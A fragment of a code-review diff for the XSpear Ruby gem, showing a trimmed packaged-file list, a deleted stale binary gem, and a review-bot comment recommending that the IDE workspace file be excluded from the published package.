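 - README.md
 - Rakefile
-- XSpear-1.0.3.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup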
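Review bot: The `files:` list drops the stale `XSpear-1.0.3.gem`, but, judging by the `data/.idea/workspace.xml` section of this same diff, the published gem still packages the IDE workspace file, which carries the author's local environment details (`$USER_HOME$/.rvm/gems/ruby-2.4.6/...`, `/usr/local/bin/rake`) and churns on every build. Exclude it where the gemspec selects files, e.g. `spec.files = spec.files.reject { |f| f.start_with?('.idea/') }`, so only source ships. The gemspec itself is not in view, so the exact file glob cannot be checked here.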
data/XSpear-1.0.3.gem
DELETED
|
Binary file
|